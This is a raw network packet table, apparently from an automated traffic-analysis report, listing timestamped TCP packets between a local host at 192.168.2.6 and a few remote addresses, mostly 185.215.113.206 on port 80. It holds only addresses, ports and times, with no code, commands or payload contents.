Nov 23, 2024 07:09:41.741916895 CET	443	49868	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:41.753640890 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.753704071 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.753782034 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.753829956 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.755876064 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.755970001 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.756019115 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.760142088 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.760200024 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.830948114 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.831010103 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.831044912 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.831265926 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.832343102 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.832410097 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.832473040 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.832513094 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.835294008 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.835352898 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.835391998 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.835597992 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.838258028 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.838315010 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.838371992 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.838426113 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.841236115 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.841306925 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.841361046 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.841495991 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.844089985 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.844152927 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.844189882 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.844238997 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.846976042 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.847032070 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.847069025 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.847109079 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.849775076 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.849844933 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.849881887 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.849900007 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.852591038 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.852724075 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.852730989 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.852770090 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.855432987 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.855500937 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.855532885 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.855544090 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.858221054 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.858273983 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.858299971 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.858345985 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.861008883 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.861068964 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.861125946 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.861222029 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.863847971 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.863954067 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.863975048 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.863997936 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.866676092 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.866739035 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.866774082 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.866815090 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.869510889 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.869641066 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.869647980 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.869680882 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.872313976 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.872380018 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.872522116 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.872565985 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.875159025 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.875243902 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.875292063 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.875303030 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.954827070 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.954880953 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.954930067 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.954941034 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.955404997 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.955450058 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.955511093 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.955630064 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.957536936 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.957616091 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.957645893 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.957763910 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.959630966 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.959700108 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.959732056 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.959835052 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.961729050 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.961786985 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.961843014 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.961910009 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.963862896 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.963912010 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.963970900 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.964016914 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.965991974 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.966051102 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.966130972 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.966169119 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.968087912 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.968151093 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.968197107 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.968239069 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.970247030 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.970278978 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.970316887 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.970339060 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.972301006 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.972381115 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.972413063 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.972512007 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.974431992 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.974492073 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.974534988 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.974621058 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.976558924 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.976608038 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.976681948 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.976722002 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.978631020 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.978811979 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.032222986 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.032286882 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.032309055 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.032347918 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.033128023 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.033170938 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.033214092 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.033257008 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.034679890 CET	49870	443	192.168.2.6	150.171.28.10
Nov 23, 2024 07:09:42.034734011 CET	443	49870	150.171.28.10	192.168.2.6
Nov 23, 2024 07:09:42.034817934 CET	49870	443	192.168.2.6	150.171.28.10
Nov 23, 2024 07:09:42.035249949 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.035315990 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.035371065 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.035481930 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.036993980 CET	49870	443	192.168.2.6	150.171.28.10
Nov 23, 2024 07:09:42.037019968 CET	443	49870	150.171.28.10	192.168.2.6
Nov 23, 2024 07:09:42.037377119 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.037425995 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.037496090 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.037631989 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.039482117 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.039555073 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.039575100 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.039601088 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.041579962 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.041630030 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.041747093 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.041836977 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.043747902 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.043812037 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.043873072 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.043917894 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.045810938 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.045864105 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.045911074 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.046019077 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.047940016 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.047997952 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.048022032 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.048227072 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.050060034 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.050160885 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.050173998 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.050213099 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.052135944 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.052207947 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.052249908 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.052366972 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.054264069 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.054313898 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.054367065 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.054409981 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.056381941 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.056438923 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.056478977 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.056555986 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.058648109 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.058747053 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.058794975 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.060570002 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.060661077 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.060677052 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.060735941 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.062715054 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.062781096 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.062834024 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.063019991 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.064836025 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.064897060 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.064935923 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.065000057 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.066971064 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.067082882 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.067092896 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.067600965 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.069044113 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.069108009 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.069147110 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.069248915 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.071245909 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.071336031 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.071392059 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.073295116 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.073359013 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.073411942 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.075391054 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.075509071 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.075556040 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.077512980 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.077569008 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.077711105 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.077761889 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.079598904 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.079648018 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.079694986 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.079801083 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.081707954 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.081760883 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.081839085 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.081882000 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.083868980 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.083914995 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.083966017 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.084022999 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.085959911 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.086071014 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.086106062 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.086126089 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.088041067 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.088131905 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.088148117 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.088284969 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.090152979 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.090219021 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.090230942 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.090259075 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.092277050 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.092331886 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.092381954 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.092427969 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.094383001 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.094499111 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.094542027 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.096530914 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.096576929 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.096641064 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.096692085 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.098624945 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.098750114 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.098802090 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.100688934 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.100742102 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.155944109 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.156066895 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.156090975 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.156122923 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.157011986 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.157073021 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.157099009 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.157166958 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.158622026 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.158750057 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.158771038 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.158824921 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.160737038 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.160810947 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.160840034 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.161036968 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.162858963 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.162969112 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.163024902 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.165031910 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.165141106 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.165170908 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.165179968 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.167099953 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.167207956 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.167233944 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.167242050 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.169204950 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.169332027 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.169352055 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.169399977 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.171324015 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.171430111 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.171462059 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.171462059 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.173430920 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.173479080 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.173510075 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.173548937 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.175565958 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.175664902 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.175690889 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.175700903 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.177664042 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.177726984 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.177757025 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.177809954 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.179769039 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.179872990 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.179933071 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.181879044 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.181973934 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.182024002 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.183964968 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.184035063 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.184073925 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.184144974 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.186095953 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.186194897 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.186207056 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.186229944 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.188208103 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.188309908 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.188332081 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.188340902 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.190318108 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.190443993 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.190494061 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.192446947 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.192521095 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.201992035 CET	49874	443	192.168.2.6	2.16.158.35
Nov 23, 2024 07:09:42.202037096 CET	443	49874	2.16.158.35	192.168.2.6
Nov 23, 2024 07:09:42.202284098 CET	49874	443	192.168.2.6	2.16.158.35
Nov 23, 2024 07:09:42.204011917 CET	49874	443	192.168.2.6	2.16.158.35
Nov 23, 2024 07:09:42.204025984 CET	443	49874	2.16.158.35	192.168.2.6
Nov 23, 2024 07:09:42.233275890 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.233432055 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.233449936 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.233474970 CET	49817	80	192.168.2.6	185.215.113.206
